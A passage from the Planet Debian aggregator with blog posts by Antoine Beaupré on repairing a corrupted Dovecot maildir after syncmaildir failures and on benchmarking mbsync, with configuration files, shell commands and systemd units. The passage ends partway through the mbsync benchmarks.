Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385034 anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 384993

That is: even more messages missing (now 37). Sigh.

Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through.

Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy.

Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:

notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids

And then we can see how many messages notmuch thinks are missing:

$ wc -l *msgids 372723 Maildir-mbsync-msgids 372752 Maildir-msgids

That's 29 messages. Oddly, it doesn't exactly match the find output:

anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 385204 anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385241

That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely, so the totals actually match.

In the notmuch output, there's a lot of stuff like this:

id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4

Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for.

What remains is:

anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l 2 anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l 21 anarcat@angela:~(main)$

ie. 21 missing from mbsync, and, surprisingly, 2 missing from the original mail spool.

Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

Conclusion

As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format on its file, and it seems unwise to bypass that.

In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect.

In other words, just talking with an IMAP server opens up a lot more possibilities of hosting than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently and it would have been possible for SMD to permanently corrupt significant part of my mail archives.

In the end, however, the last drop was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it.

In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mail box corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm.

Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

Categories: FLOSS Project Planets

Antoine Beaupré: The last syncmaildir crash

Planet Debian - Sun, 2021-11-21 11:04

My syncmaildir (SMD) setup failed me one too many times (previously, previously). In an attempt to migrate to an alternative mail synchronization tool, I looked into using my IMAP server again, and found out my mail spool was in a pretty bad shape. I'm comparing mbsync and offlineimap in the next post but this post talks about how I recovered the mail spool so that tools like those could correctly synchronise the mail spool again.

The latest crash

On Monday, SMD just started failing with this error:

nov 15 16:12:19 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:12:22 angela systemd[2305]: smd-pull.service: Succeeded. nov 15 16:12:22 angela systemd[2305]: Finished pull emails with syncmaildir. nov 15 16:14:08 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE nov 15 16:14:11 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'. nov 15 16:14:11 angela systemd[2305]: Failed to start pull emails with syncmaildir. nov 15 16:16:14 angela systemd[2305]: Starting pull emails with syncmaildir... nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Unable to get any data from the other endpoint. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: This problem may be transient, please retry. nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Hint: did you correctly setup the SERVERNAME variable nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: on your client? Did you add an entry for it in your ssh nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: configuration file? nov 15 16:16:17 angela smd-pull[27178]: smd-client: ERROR: Network error nov 15 16:16:17 angela smd-pull[27188]: register: smd-client@localhost: TAGS: error::context(handshake) probable-cause(network) human-intervention(avoidable) suggested-actions(retry) nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Main process exited, code=exited, status=1/FAILURE nov 15 16:16:17 angela systemd[2305]: smd-pull.service: Failed with result 'exit-code'. nov 15 16:16:17 angela systemd[2305]: Failed to start pull emails with syncmaildir.

What is frustrating is that there's actually no network error here. Running the command by hand I did see a different message, but now I have lost it in my backlog. It had something to do with a filename being too long, and I gave up debugging after a while. This happened suddenly too, which added to the confusion.

In a fit of rage I started this blog post and experimenting with alternatives, which led me down a lot of rabbit holes.

Reviewing my previous mail crash documentation, it seems most solutions involve talking to an IMAP server, so I figured I would just do that. Wanting to try something new, i gave isync (AKA mbsync) a try. Oh dear, I did not expect how much trouble just talking to my IMAP server would be, which wasn't not isync's fault, for what that's worth. It was the primary tool I used to debug things, and served me well in that regard.

Mailbox corruption

The first thing I found out is that certain messages in the IMAP spool were corrupted. mbsync would stop on a FETCH command and Dovecot would give me those errors on the server side.

"wrong W value" nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Maildir filename has wrong W value, renamed the file from /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S to /home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495:2,S nov 16 15:31:27 marcos dovecot[3621800]: imap(anarcat)<3630489><wAmSzO3QZtfAqAB1>: Error: Mailbox junk: Deleting corrupted cache record uid=1582: UID 1582: Broken virtual size in mailbox junk: read(/home/anarcat/Maildir/.junk/cur/1454623938.M101164P22216.marcos,S=2495,W=2578:2,S): FETCH BODY[] got too little data: 2540 vs 2578

At least this first error was automatically healed by Dovecot (by renaming the file without the W= flag). The problem is that the FETCH command fails and mbsync exits noisily. So you need to constantly restart mbsync with a silly command like:

while ! mbsync -a; do sleep 1; done "cached message size larger than expected" nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=mail stream) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: Deleting corrupted cache record uid=19288: UID 19288: Broken physical size in mailbox Sent: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) nov 16 13:53:08 marcos dovecot[3520770]: imap(anarcat)<3594402><M5JHb+zQ3NLAqAB1>: Error: Mailbox Sent: UID=19288: read(/home/anarcat/Maildir/.Sent/cur/1224790447.M898726P9811V000000000000FE06I00794FB1_0.marvin,S=2588:2,S) failed: Cached message size larger than expected (2588 > 2482, box=Sent, UID=19288) (read reason=) nov 16 13:53:08 marcos dovecot[3520770]: imap-login: Panic: epoll_ctl(del, 7) failed: Bad file descriptor

This second problem is much harder to fix, because dovecot does not recover automatically. This is Dovecot complaining that the cached size (the S= field, but also present in Dovecot's metadata files) doesn't match the file size.

I wonder if at least some of those messages were corrupted in the OfflineIMAP to syncmaildir migration because part of that procedure is to run the strip_header script to remove content from the emails. That could easily have broken things since the files do not also get renamed.

Workaround

So I read a lot of the Dovecot documentation on the maildir format, and wrote an extensive fix script for those two errors. The script worked and mbsync was able to sync the entire mail spool.

And no, rebuilding the index files didn't work. Also tried doveadm force-resync -u anarcat which didn't do anything.

In the end I also had to do this, because the wrong cache values were also stored elsewhere.

service dovecot stop ; find -name 'dovecot*' -delete; service dovecot start

This would have totally broken any existing clients, but thankfully I'm starting from scratch (except maybe webmail, but I'm hoping it will self-heal as well, assuming it only has a cache and not a full replica of the mail spool).

Incoherence between Maildir and IMAP

Unfortunately, the first mbsync was incomplete as it was missing about 15,000 mails:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 384836 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 369221

As it turns out, mbsync was not at fault here either: this was yet more mail spool corruption.

It's actually 26 folders (out of 205) with inconsistent sizes, which can be found with:

for folder in * .[^.]* ; do printf "%s\t%d\n" $folder $(find "$folder" -type f -a \! -name '.*' | wc -l ); done

The special \! -name '.*' bit is to ignore the mbsync metadata, which creates .uidvalidity and .mbsyncstate in every folder. That ignores about 200 files but since they are spread around all folders, which was making it impossible to review where the problem was.

Here is what the diff looks like:

--- Maildir-list 2021-11-17 20:42:36.504246752 -0500 +++ Maildir-mbsync-list 2021-11-17 20:18:07.731806601 -0500 @@ -6,16 +6,15 @@ [...] .Archives 1 .Archives.2010 3553 -.Archives.2011 3583 -.Archives.2012 12593 +.Archives.2011 3582 +.Archives.2012 620 .Archives.2013 8576 .Archives.2014 11057 -.Archives.2015 8173 +.Archives.2015 8165 .Archives.2016 54 .band 34 .bitbuck 1 @@ -38,13 +37,12 @@ .couchsurfers 2 -cur 11285 +cur 11280 .current 130 .cv 2 .debbug 262 -.debian 37544 -drafts 1 -.Drafts 4 +.debian 37533 +.Drafts 2 .drone 241 .drupal 188 .drupal-devel 303 [...] Misfiled messages

It's a bit all over the place, but we can already notice some huge differences between mailboxes, for example in the Archives folders. As it turns out, at least 12,000 of those missing mails were actually misfiled: instead of being in the Maildir/.Archives.2012/cur/ folder, they were directly in Maildir/.Archives.2012/. This is something that doesn't matter for SMD (and possibly for notmuch? it does matter, notmuch suddenly found 12,000 new mails) but that definitely matters to Dovecot and therefore mbsync...

After moving those files around, we still have 4,000 message missing:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 381196 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385053

The problem is that those 4,000 missing mails are harder to track. Take, for example, .Archives.2011, which has a single message missing, out of 3,582. And the files are not identical: the checksums don't match after going through the IMAP transport, so we can't use a tool like hashdeep to compare the trees and find why any single file is missing.

"register" folder

One big chunk of the 4,000, however, is a special folder called register in my spool, which I am syncing separately (see Securing registration email for details on that setup). That actually covers 3,700 of those messages, so I actually have a more modest 300 messages to figure out, after (easily!) configuring mbsync to sync that folder separately:

@@ -30,9 +33,29 @@ Slave :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything -Patterns * +#Patterns * +Patterns * !register !.register # Automatically create missing mailboxes, both locally and on the server #Create Both Create slave # Sync the movement of messages between folders and deletions, add after making sure the sync works #Expunge Both + +IMAPAccount anarcat-register +Host imap.anarc.at +User register +PassCmd "pass imap.anarc.at-register" +SSLType IMAPS +CertificateFile /etc/ssl/certs/ca-certificates.crt + +IMAPStore anarcat-register-remote +Account anarcat-register + +MaildirStore anarcat-register-local +SubFolders Maildir++ +Inbox ~/Maildir-mbsync/.register/ + +Channel anarcat-register +Master :anarcat-register-remote: +Slave :anarcat-register-local: +Create slave "tmp" folders and empty messages

After syncing the "register" messages, I end up with the measly little 160 emails out of sync:

anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384900 anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 385059

Argh. After more digging, I have found 131 mails in the tmp/ directories of the client's mail spool. Mysterious! On the server side, it's even more files, and not the same ones. Possible that those were mails that were left there during a failed delivery of some sort, during a power failure or some sort of crash? Who knows. It could be another race condition in SMD if it runs while mail is being delivered in tmp/...

The first thing to do with those is to cleanup a bunch of empty files (21 on angela):

find .[^.]*/tmp -type f -empty -delete

As it turns out, they are all duplicates, in the sense that notmuch can easily find a copy of files with the same message ID in its database. In other words, this hairy command returns nothing

find .[^.]*/tmp -type f | while read path; do msgid=$(grep -m 1 -i ^message-id "$path" | sed 's/Message-ID: //i;s/[<>]//g'); if notmuch count --exclude=false "id:$msgid" | grep -q 0; then echo "$path <$msgid> not in notmuch" ; fi; done

... which is good. Or, to put it another way, this is safe:

find .[^.]*/tmp -type f -delete

Poof! 314 mails cleaned on the server side. Interestingly, SMD doesn't pick up on those changes at all and still sees files in tmp/ directories on the client side, so we need to operate the same twisted logic there.

notmuch to the rescue again

After cleaning that on the client, we get:

anarcat@angela:~(main)$ find Maildir/ -type f -a \! -name '.*' | wc -l 384928 anarcat@angela:~(main)$ find Maildir-mbsync/ -type f -a \! -name '.*' | wc -l 384901

Ha! 27 mails difference. Those are the really sticky, unclear ones. I was hoping a full sync might clear that up, but after deleting the entire directory and starting from scratch, I end up with:

anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385034 anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 384993

That is: even more messages missing (now 37). Sigh.

Thankfully, this is something notmuch can help with: it can index all files by Message-ID (which I learned is case-insensitive, yay) and tell us which messages don't make it through.

Considering the corruption I found in the mail spool, I wouldn't be the least surprised those messages are just skipped by the IMAP server. Unfortunately, there's nothing on the Dovecot server logs that would explain the discrepancy.

Here again, notmuch comes to the rescue. We can list all message IDs to figure out that discrepancy:

notmuch search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-msgids notmuch --config=.notmuch-config-mbsync search --exclude=false --output=messages '*' | pv -s 18M | sort > Maildir-mbsync-msgids

And then we can see how many messages notmuch thinks are missing:

$ wc -l *msgids 372723 Maildir-mbsync-msgids 372752 Maildir-msgids

That's 29 messages. Oddly, it doesn't exactly match the find output:

anarcat@angela:~(main)$ find Maildir-mbsync -type f -type f -a \! -name '.*' | wc -l 385204 anarcat@angela:~(main)$ find Maildir -type f -type f -a \! -name '.*' | wc -l 385241

That is 10 more messages. Ugh. But actually, I know what those are: more misfiled messages (in a .folder/draft/ directory, bizarrely, so the totals actually match.

In the notmuch output, there's a lot of stuff like this:

id:notmuch-sha1-fb880d673e24f5dae71b6b4d825d4a0d5d01cde4

Those are messages without a valid Message-ID. Notmuch (presumably) constructs one based on the file's checksum. Because the files differ between the IMAP server and the local mail spool (which is unfortunate, but possibly inevitable), those do not match. There are exactly the same number of those on both sides, so I'll go ahead and assume those are all accounted for.

What remains is:

anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\-[^-]' | grep -v sha1 | wc -l 2 anarcat@angela:~(main)$ diff -u Maildir-mbsync-msgids Maildir-msgids | grep '^\+[^+]' | grep -v sha1 | wc -l 21 anarcat@angela:~(main)$

ie. 21 missing from mbsync, and, surprisingly, 2 missing from the original mail spool.

Further inspection also showed they were all messages with some sort of "corruption": no body and only headers. I am not sure that is a legal email format in the first place. Since they were mostly spam or administrative emails ("You have been unsubscribed from mailing list..."), it seems fairly harmless to ignore those.

Conclusion

As we'll see in the next article, SMD has stellar performance. But that comes at a huge cost: it accesses the mail storage directly. This can (and has) created significant problems on the mail server. It's unclear exactly why those things happen, but Dovecot expects a particular storage format on its file, and it seems unwise to bypass that.

In the future, I'll try to remember to avoid that, especially since mechanisms like SMD require special server access (SSH) which, in the long term, I am not sure I want to maintain or expect.

In other words, just talking with an IMAP server opens up a lot more possibilities of hosting than setting up a custom synchronisation protocol over SSH. It's also safer and more reliable, as we have seen. Thankfully, I've been able to recover from all the errors I could find, but it could have gone differently and it would have been possible for SMD to permanently corrupt significant part of my mail archives.

In the end, however, the last drop was just another weird bug which, ironically, SMD mysteriously recovered from on its own while I was writing this documentation and migrating away from it.

In any case, I recommend SMD users start looking for alternatives. The project has been archived upstream, and the Debian package has been orphaned. I have seen significant mail box corruption, including entire mail spool destruction, mostly due to incorrect locking code. I have filed a release-critical bug in Debian to make sure it doesn't ship with Debian bookworm.

Alternatives like mbsync provide fast and reliable transport, including over SSH. See the next article for further discussion of the alternatives.

Categories: FLOSS Project Planets

Antoine Beaupré: mbsync vs OfflineIMAP

Planet Debian - Sun, 2021-11-21 11:04

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync).

But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time.

Read on for the details.

Benchmark setup

All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye.

The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive.

The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C).

The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:

$ notmuch count --exclude=false 372758 $ du -sh --exclude xapian Maildir 13G Maildir

The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely.

Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline.

A baseline for a full sync might be also set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/ 12,647,814,731 100% 37.85MB/s 0:05:18 (xfr#394981, to-chk=0/395815) 72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k 8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps

That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/ 0 0% 0.00kB/s 0:00:00 (xfr#0, to-chk=0/395815) 1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k 120inputs+0outputs (3major+12709minor)pagefaults 0swaps

As an extra curiosity, here's the performance with tar, pretty similar with rsync, minus incremental which I cannot be bothered to figure out right now:

anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf - 56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k 0inputs+0outputs (0major+7266minor)pagefaults 0swaps 12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%

Interesting that rsync manages to almost beat a plain tar on file transfer, I'm actually surprised by how well it performs here, considering there are many little files to transfer.

(But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?)

Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:

anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar 15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%

That's 131Mibyyte per second, vastly faster than the gigabit link. The client has similar performance:

anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar 16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%

So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways.

Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It show SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync

The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirorrs, message flags, full folder support, and "trash" functionality.

Complex configuration file

I started with this .mbsyncrc configuration file:

SyncState * Sync New ReNew Flags IMAPAccount anarcat Host imap.anarc.at User anarcat PassCmd "pass imap.anarc.at" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPStore anarcat-remote Account anarcat MaildirStore anarcat-local # Maildir/top/sub/sub #SubFolders Verbatim # Maildir/.top.sub.sub SubFolders Maildir++ # Maildir/top/.sub/.sub # SubFolders legacy # The trailing "/" is important #Path ~/Maildir-mbsync/ Inbox ~/Maildir-mbsync/ Channel anarcat # AKA Far, convert when all clients are 1.4+ Master :anarcat-remote: # AKA Near Slave :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything Patterns * # Automatically create missing mailboxes, both locally and on the server #Create Both Create slave # Sync the movement of messages between folders and deletions, add after making sure the sync works #Expunge Both

Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of a "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian packages ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax.

Also, that syntax is a little overly complicated. For example, Far needs colons, like:

Far :anarcat-remote:

Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global.

Using a more standard format like .INI or TOML could improve that situation.

Stellar performance

A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive.

It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync.

The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.015 0.052 1.930 2.029 2.105 user 0.660 0.040 0.592 0.661 0.722 sys 0.338 0.033 0.268 0.341 0.387

Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m.

Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:

120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k 29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps

That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.500 0.087 2.340 2.491 2.629 user 0.718 0.037 0.679 0.711 0.793 sys 0.322 0.024 0.284 0.320 0.365

Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 31.531 0.724 30.764 31.271 33.100 user 1.858 0.125 1.721 1.818 2.131 sys 0.610 0.063 0.506 0.600 0.695

That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface

Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:

anarcat@angela:~(main)$ mbsync -a Notice: Master/Slave are deprecated; use Far/Near instead. C: 1/2 B: 204/205 F: +0/0 *0/0 #0/0 N: +1/200 *0/0 #0/0

(Note that nice switch away from slavery-related terms too.)

The display is minimal, and yet informative. It's not obvious what does mean at first glance, but the manpage is useful at least for clarifying that:

This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).

In other words:

  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted

You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary mail traffic in the logs.

Interoperability issue

In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:

notmuch search --output=files --format=text0 "$search_spam" \ | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"

This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:

Maildir error: duplicate UID 37578.

And indeed, there are now two messages with that UID in the mailbox:

anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*' Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S

This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":

When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir fold ers. Mutt always does that, while mu4e needs to be configured to do it:

(setq mu4e-change-filenames-when-moving t)

So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above.

Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like.

(A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.)

Stability issues

The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which lead to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect.

The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more.

Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it...

Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues.

Automation with systemd

The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages.

I have used the following .service file:

[Unit] Description=Mailbox synchronization service ConditionHost=!marcos Wants=network-online.target After=network-online.target Before=notmuch-new.service [Service] Type=oneshot ExecStart=/usr/bin/mbsync -a Nice=10 IOSchedulingClass=idle NoNewPrivileges=true [Install] WantedBy=default.target

And the following .timer:

[Unit] Description=Mailbox synchronization timer ConditionHost=!marcos [Timer] OnBootSec=2m OnUnitActiveSec=5m Unit=mbsync.service [Install] WantedBy=timers.target

Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:

[Unit] Description=notmuch new After=mbsync.service [Service] Type=oneshot Nice=10 ExecStart=/usr/bin/notmuch new [Install] WantedBy=mbsync.service

An improvement over polling repeatedly with a .timer would be to wake up only on IMAP notify, but neither imapnotify nor goimapnotify seem to be packaged in Debian. It would also not cover for the "sent folder" use case, where we need to wake up on local changes.

Password-less setup

The sample file suggests this should work:

IMAPStore remote Tunnel "ssh -q host.remote.com /usr/sbin/imapd"

Add BatchMode, restrict to IdentitiesOnly, provide a password-less key just for this, add compression (-C), find the Dovecot imap binary, and you get this:

IMAPAccount anarcat-tunnel Tunnel "ssh -o BatchMode=yes -o IdentitiesOnly=yes -i ~/.ssh/id_ed25519_mbsync -o HostKeyAlias=shell.anarc.at -C anarcat@imap.anarc.at /usr/lib/dovecot/imap"

And it actually seems to work:

$ mbsync -a Notice: Master/Slave are deprecated; use Far/Near instead. C: 0/2 B: 0/1 F: +0/0 *0/0 #0/0 N: +0/0 *0/0 #0/0imap(anarcat): Error: net_connect_unix(/run/dovecot/stats-writer) failed: Permission denied C: 2/2 B: 205/205 F: +0/0 *0/0 #0/0 N: +1/1 *3/3 #0/0imap(anarcat)<1611280><90uUOuyElmEQlhgAFjQyWQ>: Info: Logged out in=10808 out=15396642 deleted=0 expunged=0 trashed=0 hdr_count=0 hdr_bytes=0 body_count=1 body_bytes=8087

It's a bit noisy, however. dovecot/imap doesn't have a "usage" to speak of, but even the source code doesn't hint at a way to disable that Error message, so that's unfortunate. That socket is owned by root:dovecot so presumably Dovecot runs the imap process as $user:dovecot, which we can't do here. Oh well?

Interestingly, the SSH setup is not faster than IMAP.

With IMAP:

